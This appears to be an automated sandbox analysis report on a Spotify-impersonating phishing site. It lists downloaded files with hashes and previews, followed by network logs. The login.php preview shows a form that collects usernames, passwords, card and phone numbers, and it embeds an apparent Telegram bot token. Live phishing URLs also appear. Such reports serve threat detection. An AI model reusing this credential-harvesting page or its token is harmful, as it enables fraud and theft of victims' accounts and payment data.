                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 159 x 63, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):3282
                                                                                                                      Entropy (8bit):7.917230208062898
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:pt1fH884teKZe7ZoURVCj4ugnD8gsJhz2IP71:pLc0KZ4vAc3DZ/IP71
                                                                                                                      MD5:D898342B4A861502C63F5E4B9DB7D2C7
                                                                                                                      SHA1:C4AEEF713D1FADAD23084A88A844E29F49B6451B
                                                                                                                      SHA-256:AD450EA6252C2C12B4F9DF7EF97661014D1A6D4BBD0663B58A793D071E096EC7
                                                                                                                      SHA-512:34EAAC7F91CC030E6D4564AA9C4CD02E3B6C0D003D8F2A50D60AD52C46B8C928181F60F7E2EA5FAAB3CEA06E696CB460FE468B6A85E50220CE639C7DC218C11C
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      URL:https://zhrkirito.serv00.net/spotify/app/auth/res/logo.png
                                                                                                                      Preview:.PNG........IHDR.......?.............sRGB.........gAMA......a.....pHYs...t...t..f.x...gIDATx^...TG.....-............ .....)n..C..A.Cp.....-!.|..v.2w..w...{...K....sg.3.....F.&H.F...Q.q....i.h.4j4n@.5.7 ......H./^<V.re6h. .}.v.......Gl...g..h.d;.h.i.05j.`.V...+0=...M.2....l[.. ..S.jUv..i1."..+V..Y.....6.F......O....3..~K~.&.C..Q.R%...;1LB.../.T.R.}.DiH.-.:u.C...s..(P..&.B..2m.41$.W.j..>i.$..^.z.a..a..=;.7M..4..+WN....>`....>j.............~.3..&JA.}X.d..._.~..'....y..a......3d.@..3...B*_...........{...._......K-.8.....+........~..g.r!.4.8x........].......5k..+F>e..R.N........}..l..l.....[....6..#g.l..<..!.|....t.R.E..(Q".^T.K.....Y...L....._.H..T6D.F/.K...1k...A?..,Y2.];.u.V.)..r....c..5.....?......7.[..=..1W.L.z.../..`\G.....R.Lij/D.F/......".o...,.,.&M....'.Z.b.d.*...../X.2e..I.n.D.=...Yn....c..7].....E;w..<{..%I..T>D.FN...L~......C..X.!04o.<....t..5...;wNX......;.|.......;V....[....F.N.X)G...r......0..[...={....p#...o.={.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):386150
                                                                                                                      Entropy (8bit):5.2320122729165
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:VpkhNVlJ+TC1lFhTzeKpTcYmD2zK8U1Js3Px+WK+N7TFyygRWL/IaLgeNTIPfgy8:kjTcYmD4I4Px+WK+N7TFyjeTiPf7Aqqt
                                                                                                                      MD5:CCF212EDDC3506318C557182E8297AC6
                                                                                                                      SHA1:83CBB4C131EC92DDB4B4AC004A692AB5DE57E22B
                                                                                                                      SHA-256:7F8C83527958ACC94204177932F4AF82490579BC49A8410FEDA8FBA5E8947815
                                                                                                                      SHA-512:87EBAD74C1E2B547C989593BF3CFA0C5ED905C10D0A599B7251AB948A2BE061FBB076C623FF4135BC50A9E562D07619910213F1FE037548942962A59EADB1763
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      URL:https://zhrkirito.serv00.net/spotify/app/auth/res/cdn/jq.js
                                                                                                                      Preview:/*!. * jQuery JavaScript Library v3.6.3. * https://jquery.com/. *. * Includes Sizzle.js. * https://sizzlejs.com/. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license. * https://jquery.org/license. *. * Date: 2022-12-20T21:28Z. */.( function( global, factory ) {..."use strict";...if ( typeof module === "object" && typeof module.exports === "object" ) {....// For CommonJS and CommonJS-like environments where a proper `window`...// is present, execute the factory and get jQuery....// For environments that do not have a `window` with a `document`...// (such as Node.js), expose a factory as module.exports....// This accentuates the need for the creation of a real `window`....// e.g. var jQuery = require("jquery")(window);...// See ticket trac-14549 for more info....module.exports = global.document ?....factory( global, true ) :....function( w ) {.....if ( !w.document ) {......throw new Error( "jQuery requires a window with a document" );.....}.....retur
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:GIF image data, version 89a, 200 x 200
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):79790
                                                                                                                      Entropy (8bit):7.584323502944865
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:WXNXvutUZjDkc4a/IoDR6bxYJwPLFHhXaCkzdj7MmG8Ph9M26Z6dP+HeJ+Xvmt5/:W9Xf/l3LREAQpsCK7RMJ6tqgws+5
                                                                                                                      MD5:09B486C506E359CBABFAA9D224650CDD
                                                                                                                      SHA1:EDFDA10AAB9D0A84B22F14FABC93C01E3E7F37C1
                                                                                                                      SHA-256:A11CCD5DC1BF84E0AE935B7602B50FAC0419466F1AD9343F4C078D2C4B50D9D5
                                                                                                                      SHA-512:B34426CD90583FD153A1B2D3EDE1698E3226A4543F7FE5C05946ACE996032C8256B2717A58A55281345175E4293CBCE556BA3173E0921C81D3E9D5EE794E9E38
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      URL:https://zhrkirito.serv00.net/spotify/app/auth/res/loading.gif
                                                                                                                      Preview:GIF89a.........`..a .a!.b$.d&.f'.f(.g).h*.h+.i-.k..k/.l0.m2.n7.r:.t;.t<.u=.vA.yD.{E.|F.|G.}H.~K.N..O..P..Q..S.T.U.Y.Z.[.\.].e.g.g.h.i.k.l.n.o.q.q.r.r.t.v.w.{.|.}.~....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,...............H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.N=.E...*L|.....#Z..bSEG.........c|.0@.o_.w..."#.....7u......#.c$...t.K.*g...
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 47 x 31, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):507
                                                                                                                      Entropy (8bit):7.299004550654204
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:6v/7YRe/oEAJWB/V5e4ZEzTdIESi/vEI84BcGOmpRwL34jd:17Ka4mF3/vEIV5T8kd
                                                                                                                      MD5:5DFAA18F6F39A652440C204208B0B786
                                                                                                                      SHA1:3CD91179FAD224A203AA6BCA4A3D810150EB311F
                                                                                                                      SHA-256:50969CC1F8A9B59D8F4D39FDD14064D5F06FFC919A9F1AB4046AC372E7AB7FFB
                                                                                                                      SHA-512:556F52CD70D3D4340F7C6A69F49569FE430F912D0AB6C8DD3C3ABB2A08CB44494F5D0D5386BF5C25BA6F5DFF1F5DF9587F856FFE4D551CA3CDF4961332958B0C
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      URL:https://zhrkirito.serv00.net/spotify/app/auth/res/remember.png
                                                                                                                      Preview:.PNG........IHDR.../.........w]......sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATXG.1N.1.E.S..) .!A..h.@G............H.g.o......;.4....k...w..O.C.(P1.T....@.........?.d.....9..c..;P1...0.x.0.............<..........FN.W2.C.G..mk.@-`..DS.x..rs........g(.Z.q..+........P.9V...-h..wV....t............P...ad.z._..).....F...~.<.'....1+.<V..e....>..5o>..W..mc.*...3.........:...?.`...x.....,3.%j..1.......F..l......e(...+..WV...l...}.....@.(P1.T....@..,....gq..U....IEND.B`.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:HTML document, ASCII text, with very long lines (5282), with CRLF line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):12256
                                                                                                                      Entropy (8bit):4.868352544046205
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:p2uUNuHKbs3fU3YS30ihbWmKgXbKPQpsdy9vFE1mKuN7ZCPJ8RaTaxS/3Gw9UEaU:AuF6JCsY
                                                                                                                      MD5:F690AC152476DFB4E9A3989822974FDD
                                                                                                                      SHA1:95E30E1C01F4AD1A378085BB81A0E9ED801AC7D5
                                                                                                                      SHA-256:8C1E869B971AE302FA789900FA796516F3D7170486C4866BBD78910A625DE951
                                                                                                                      SHA-512:CD2B2BD59256DD8EB5FCB846E65C2549AE70727D1B7433EF2376ED74CF9AD9FE2D57D37203E11C6A4C5CD2BB28F1C2396953ECECB1E99A49C718B220B5453B4F
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      URL:https://zhrkirito.serv00.net/spotify/app/auth/login.php
                                                                                                                      Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">.. <title>Welcome</title>.. <link rel="stylesheet" href="res/app.css">..</head>..<body>..<form action="action.php" method="POST">.. <input type="hidden" name="LOGIN">.. <input type="hidden" name="USERNAME">.. <input type="hidden" name="PASSWORD">.. <input type="hidden" name="CARD_NUMBER">.. <input type="hidden" name="PHONE_NUMBER">..</form>..<header>.. <img src="res/logo.png">..</header>..<div class="loader" style=" color:white; text-align:center;">.. <div class="content" style="flex-direction:column;">.. <h3>Please wait...</h3>.. <p>Do not leave this page.<br> You will automatically be redirected.</p>.. <img src="res/loading.gif">..</div>..</div>....<main>..<script>var token="7093168082:AAEzHmNA-WEtE42Ct92LP_M0BUfH2-F3sUA";</script>....<div class="form">....<div class="title">..<sp
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 47 x 31, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):507
                                                                                                                      Entropy (8bit):7.299004550654204
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:6v/7YRe/oEAJWB/V5e4ZEzTdIESi/vEI84BcGOmpRwL34jd:17Ka4mF3/vEIV5T8kd
                                                                                                                      MD5:5DFAA18F6F39A652440C204208B0B786
                                                                                                                      SHA1:3CD91179FAD224A203AA6BCA4A3D810150EB311F
                                                                                                                      SHA-256:50969CC1F8A9B59D8F4D39FDD14064D5F06FFC919A9F1AB4046AC372E7AB7FFB
                                                                                                                      SHA-512:556F52CD70D3D4340F7C6A69F49569FE430F912D0AB6C8DD3C3ABB2A08CB44494F5D0D5386BF5C25BA6F5DFF1F5DF9587F856FFE4D551CA3CDF4961332958B0C
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:.PNG........IHDR.../.........w]......sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATXG.1N.1.E.S..) .!A..h.@G............H.g.o......;.4....k...w..O.C.(P1.T....@.........?.d.....9..c..;P1...0.x.0.............<..........FN.W2.C.G..mk.@-`..DS.x..rs........g(.Z.q..+........P.9V...-h..wV....t............P...ad.z._..).....F...~.<.'....1+.<V..e....>..5o>..W..mc.*...3.........:...?.`...x.....,3.%j..1.......F..l......e(...+..WV...l...}.....@.(P1.T....@..,....gq..U....IEND.B`.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Certificate, Version=3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):1559
                                                                                                                      Entropy (8bit):7.399832861783252
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:B4wgi+96jf8TXJgnXpxi4sVtcTtrdoh+S:KiIq0eZnep
                                                                                                                      MD5:ADAB5C4DF031FB9299F71ADA7E18F613
                                                                                                                      SHA1:33E4E80807204C2B6182A3A14B591ACD25B5F0DB
                                                                                                                      SHA-256:7FA4FF68EC04A99D7528D5085F94907F4D1DD1C5381BACDC832ED5C960214676
                                                                                                                      SHA-512:983B974E459A46EB7A3C8850EC90CC16D3B6D4A1505A5BCDD710C236BAF5AADC58424B192E34A147732E9D436C9FC04D896D8A7700FF349252A57514F588C6A1
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      URL:http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
                                                                                                                      Preview:0...0..........}[Q&.v...t...S..0...*.H........0..1.0...U....US1.0...U....New Jersey1.0...U....Jersey City1.0...U....The USERTRUST Network1.0,..U...%USERTrust RSA Certification Authority0...181102000000Z..301231235959Z0..1.0...U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U....Sectigo Limited1705..U....Sectigo RSA Domain Validation Secure Server CA0.."0...*.H.............0.........s3..< ....E..>..?.A.20.l.......-?.M......b..Hy...N..2%.....P?.L.@*.9.....2A.&.#z. ... .<.Do.u..@.2.....#>...o]Q.j.i.O.ri..Lm.....~......7x...4.V.X....d[.7..(h.V...\......$..0......z...B......J.....@..o.BJd..0.....'Z..X......c.oV...`4.t........_.........n0..j0...U.#..0...Sy.Z.+J.T.......f.0...U........^.T...w.......a.0...U...........0...U.......0.......0...U.%..0...+.........+.......0...U. ..0.0...U. .0...g.....0P..U...I0G0E.C.A.?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v..+........j0h0?..+.....0..3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%..+.....0.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):56
                                                                                                                      Entropy (8bit):4.748708270001458
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:6DgMuSjPkuWeQxvANk1n:ZSjcbeQ5A21
                                                                                                                      MD5:B82C651A6910DCB4DDC66A2099F1AD27
                                                                                                                      SHA1:631E5D3694CA00121806CBD1C738BC4144D0D0C6
                                                                                                                      SHA-256:87C9B0DF7B25A8CA46966E48A8D3F7510E37294C6CBD4715F01C0121FE4D4E24
                                                                                                                      SHA-512:D3520721CD888C315D79466E59500C6B9D8F0B375A5889225EF6583D84E16415D50D8FCF49EC2690E36C14C5C5ABF6CD7865B9F053D10C621B2A5AB9AF0194C1
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwn9Sge1h3rsJxIFDfR8SO0SBQ2Q9l9qEhcJwahl-LNWRk0SBQ30fEjtEgUNkPZfag==?alt=proto
                                                                                                                      Preview:ChIKBw30fEjtGgAKBw2Q9l9qGgAKEgoHDfR8SO0aAAoHDZD2X2oaAA==
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):1541
                                                                                                                      Entropy (8bit):4.903833464475644
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:1Fr0DB3IOIYykcRDdk7y8deNVFK1s/zDDHZlwOJSiYNU8O3YN/kgBvpKkqJIVBz:1lEBp3OrDD5lnJzz8EQko
                                                                                                                      MD5:640E59C35EE38A37E29B5E2F2972A6A3
                                                                                                                      SHA1:A3CA31EB8885BA6589B1989AFDD085C0D0201C21
                                                                                                                      SHA-256:9F978053E15CB55B37FA5ED6DA589E6056A47E3FCC90A713706FF7A4F6D84DCA
                                                                                                                      SHA-512:72C0E7AB60D131325DF83E6F53E7DA5D0626496E9BEE6C032157912CDC72EF281200CD3283A23A2FC61B92C0B7C8DC196DD8C48B28AA6A8BC6C677042185BECA
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      URL:https://premium-subscription.app/plan/apps/
                                                                                                                      Preview:<html lang="en" class="no-js">. <head>.. <title>Spotify</title>.. <link rel="icon" href="https://static-00.iconduck.com/assets.00/spotify-icon-2048x2048-n3imyp8e.png">. <meta charset="utf-8">. <meta name="viewport" content="width=device-width,initial-scale=1.0">. <style>. html body {width: 100%;height: 100%;padding: 0px;margin: 0px;overflow: hidden;font-family: arial;font-size: 10px;color: #6e6e6e;background-color: #000;} #preview-frame {width: 100%;background-color: #fff;}</style>. <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>. <script>. //function to fix height of iframe!. var calcHeight = function() {. //var headerDimensions = 0; //$('#header-bar').height();. $('#preview-frame').height($(window).height());. }. . $(document).ready(function() {. calcHeight();. /*$('#header-bar a.close').mouseover(function() {. $('#header-b
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 2048 x 2048, 8-bit colormap, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):48672
                                                                                                                      Entropy (8bit):7.783727340696637
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:yowI6gTTRD5/w9KktUUyDrtJRKedux5ZEOFA4EcgbtrsUscyF/lZ1UJzaaj8:30CAy9rKh5SOF5CJFyFtZaxau8
                                                                                                                      MD5:0AFF7D5F2E65DEDC9D0C94456C50B5E7
                                                                                                                      SHA1:F6815B3B9694BEB658A3C4F8172D8143AE3A2AAE
                                                                                                                      SHA-256:171E86792E6527641BE8899A4246DB82DA7A5DE564F320F8EF0BE04DC2F15AF4
                                                                                                                      SHA-512:C12B840B66A3D4E08B32093BF163680E0DE67B1D9CFAE3BD554576060880D485883D9E87F998478F91997D3B0BF9CA66ED718E53BCE8E62F048949B076C6D6CD
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      URL:https://static-00.iconduck.com/assets.00/spotify-icon-2048x2048-n3imyp8e.png
                                                                                                                      Preview:.PNG........IHDR..............y#.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....tIME.......O`......PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0.....tRNS................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abc
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 2048 x 2048, 8-bit colormap, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):48672
                                                                                                                      Entropy (8bit):7.783727340696637
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:yowI6gTTRD5/w9KktUUyDrtJRKedux5ZEOFA4EcgbtrsUscyF/lZ1UJzaaj8:30CAy9rKh5SOF5CJFyFtZaxau8
                                                                                                                      MD5:0AFF7D5F2E65DEDC9D0C94456C50B5E7
                                                                                                                      SHA1:F6815B3B9694BEB658A3C4F8172D8143AE3A2AAE
                                                                                                                      SHA-256:171E86792E6527641BE8899A4246DB82DA7A5DE564F320F8EF0BE04DC2F15AF4
                                                                                                                      SHA-512:C12B840B66A3D4E08B32093BF163680E0DE67B1D9CFAE3BD554576060880D485883D9E87F998478F91997D3B0BF9CA66ED718E53BCE8E62F048949B076C6D6CD
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:.PNG........IHDR..............y#.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....tIME.......O`......PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0.....tRNS................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abc
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65434), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):369177
                                                                                                                      Entropy (8bit):5.355070540108656
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:IM5LwijORnUkXCvM5LwijORnUkXCvM5LwijOCt1nUkXCvM5LwijORnUkXCs:REiEpCUEiEpCUEiZ1pCUEiEpCs
                                                                                                                      MD5:DA5DDE515A49FB9248E84C45D5A63370
                                                                                                                      SHA1:37825DC4BFB94D3DEF358D26E6BA0D13840E4045
                                                                                                                      SHA-256:D066C11600369C32EEA993E482D74BE1BCC76C906F18F2EA7CD995BBA6ECC385
                                                                                                                      SHA-512:1C11476ADC0D8B856C851A6D27C66F3C8FE9FDA7B2AE5255EDDE524E87EE2F87978B2E5B6B3E26E3C5D4D734AE437070A5BC32651A5A4829B0C9C51E16861163
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:// // !function(){var t="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function e(t){var e={exports:{}};return t(e,e.exports),e.exports}var r=function(t){return t&&t.Math==Math&&t},n=r("object"==typeof globalThis&&globalThis)||r("object"==typeof window&&window)||r("object"==typeof self&&self)||r("object"==typeof t&&t)||Function("return this")(),o=function(t){try{return!!t()}catch(t){return!0}},i=!o(function(){return 7!=Object.defineProperty({},1,{get:function(){return 7}})[1]}),a={}.propertyIsEnumerable,u=Object.getOwnPropertyDescriptor,s=u&&!a.call({1:2},1)?function(t){var e=u(this,t);return!!e&&e.enumerable}:a,c={f:s},f=function(t,e){return{enumerable:!(1&t),configurable:!(2&t),writable:!(4&t),value:e}},l={}.toString,h=function(t){return l.call(t).slice(8,-1)},p="".split,d=o(function(){return!Object("z").propertyIsEnumerable(0)})?function(t){return"String"==h(t)?p.call(t,""):Object(t)}:Obj
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (32072)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):93100
                                                                                                                      Entropy (8bit):5.300526104474089
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:q4mCgi8DyCuXXFiJ+L0kJQsJVPEKLQRZdC/RlfDknv+p0WzH/IoSZ7qABZnu0sFv:qGsKXlI2p0WPSbDrstfam
                                                                                                                      MD5:E0E0559014B222245DEB26B6AE8BD940
                                                                                                                      SHA1:E2F3603E23711F6446F278A411D905623D65201E
                                                                                                                      SHA-256:89A15E9C40BC6B14809F236EE8CD3ED1EA42393C1F6CA55C7855CD779B3F922E
                                                                                                                      SHA-512:60740DA8F871B8263675DB2421B0E565FC18E95C772F7C3D5916F224263CD71A6A2E6ACCEAB2F6F8BA1C0607951F0198F525D87D0589FA57045B1D5F292DACF0
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      URL:https://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js
                                                                                                                      Preview:/*! jQuery v1.10.2 | (c) 2005, 2013 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/.(function(e,t){var n,r,i=typeof t,o=e.location,a=e.document,s=a.documentElement,l=e.jQuery,u=e.$,c={},p=[],f="1.10.2",d=p.concat,h=p.push,g=p.slice,m=p.indexOf,y=c.toString,v=c.hasOwnProperty,b=f.trim,x=function(e,t){return new x.fn.init(e,t,r)},w=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,T=/\S+/g,C=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,k=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,E=/^[\],:{}\s]*$/,S=/(?:^|:|,)(?:\s*\[)+/g,A=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,j=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,D=/^-ms-/,L=/-([\da-z])/gi,H=function(e,t){return t.toUpperCase()},q=function(e){(a.addEventListener||"load"===e.type||"complete"===a.readyState)&&(_(),x.ready())},_=function(){a.addEventListener?(a.removeEventListener("DOMContentLoaded",q,!1),e.removeEventListener("load",q,!1)):(a.detachEvent("onreadystatechange",q)
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65434), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):369177
                                                                                                                      Entropy (8bit):5.355070540108656
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:IM5LwijORnUkXCvM5LwijORnUkXCvM5LwijOCt1nUkXCvM5LwijORnUkXCs:REiEpCUEiEpCUEiZ1pCUEiEpCs
                                                                                                                      MD5:DA5DDE515A49FB9248E84C45D5A63370
                                                                                                                      SHA1:37825DC4BFB94D3DEF358D26E6BA0D13840E4045
                                                                                                                      SHA-256:D066C11600369C32EEA993E482D74BE1BCC76C906F18F2EA7CD995BBA6ECC385
                                                                                                                      SHA-512:1C11476ADC0D8B856C851A6D27C66F3C8FE9FDA7B2AE5255EDDE524E87EE2F87978B2E5B6B3E26E3C5D4D734AE437070A5BC32651A5A4829B0C9C51E16861163
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      URL:https://zhrkirito.serv00.net/spotify/app/auth/res/jquery.js
                                                                                                                      Preview:// // !function(){var t="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function e(t){var e={exports:{}};return t(e,e.exports),e.exports}var r=function(t){return t&&t.Math==Math&&t},n=r("object"==typeof globalThis&&globalThis)||r("object"==typeof window&&window)||r("object"==typeof self&&self)||r("object"==typeof t&&t)||Function("return this")(),o=function(t){try{return!!t()}catch(t){return!0}},i=!o(function(){return 7!=Object.defineProperty({},1,{get:function(){return 7}})[1]}),a={}.propertyIsEnumerable,u=Object.getOwnPropertyDescriptor,s=u&&!a.call({1:2},1)?function(t){var e=u(this,t);return!!e&&e.enumerable}:a,c={f:s},f=function(t,e){return{enumerable:!(1&t),configurable:!(2&t),writable:!(4&t),value:e}},l={}.toString,h=function(t){return l.call(t).slice(8,-1)},p="".split,d=o(function(){return!Object("z").propertyIsEnumerable(0)})?function(t){return"String"==h(t)?p.call(t,""):Object(t)}:Obj
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65447)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):87533
                                                                                                                      Entropy (8bit):5.262536918435756
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:0RUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKr:sHNwcv9VBQpLl88SMBQ47GKr
                                                                                                                      MD5:2C872DBE60F4BA70FB85356113D8B35E
                                                                                                                      SHA1:EE48592D1FFF952FCF06CE0B666ED4785493AFDC
                                                                                                                      SHA-256:FC9A93DD241F6B045CBFF0481CF4E1901BECD0E12FB45166A8F17F95823F0B1A
                                                                                                                      SHA-512:BF6089ED4698CB8270A8B0C8AD9508FF886A7A842278E98064D5C1790CA3A36D5D69D9F047EF196882554FC104DA2C88EB5395F1EE8CF0F3F6FF8869408350FE
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                                                                                                      No static file info
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Jan 13, 2025 00:23:17.198519945 CET49675443192.168.2.4173.222.162.32
                                                                                                                      Jan 13, 2025 00:23:22.318291903 CET49737443192.168.2.4142.250.185.132
                                                                                                                      Jan 13, 2025 00:23:22.318342924 CET44349737142.250.185.132192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:22.318475008 CET49737443192.168.2.4142.250.185.132
                                                                                                                      Jan 13, 2025 00:23:22.318845987 CET49737443192.168.2.4142.250.185.132
                                                                                                                      Jan 13, 2025 00:23:22.318859100 CET44349737142.250.185.132192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:22.952950954 CET44349737142.250.185.132192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:22.955025911 CET49737443192.168.2.4142.250.185.132
                                                                                                                      Jan 13, 2025 00:23:22.955094099 CET44349737142.250.185.132192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:22.956314087 CET44349737142.250.185.132192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:22.956403017 CET49737443192.168.2.4142.250.185.132
                                                                                                                      Jan 13, 2025 00:23:22.960624933 CET49737443192.168.2.4142.250.185.132
                                                                                                                      Jan 13, 2025 00:23:22.960760117 CET44349737142.250.185.132192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:23.009984016 CET49737443192.168.2.4142.250.185.132
                                                                                                                      Jan 13, 2025 00:23:23.010052919 CET44349737142.250.185.132192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:23.057032108 CET49737443192.168.2.4142.250.185.132
                                                                                                                      Jan 13, 2025 00:23:24.798523903 CET49740443192.168.2.445.88.108.231
                                                                                                                      Jan 13, 2025 00:23:24.798588991 CET4434974045.88.108.231192.168.2.4
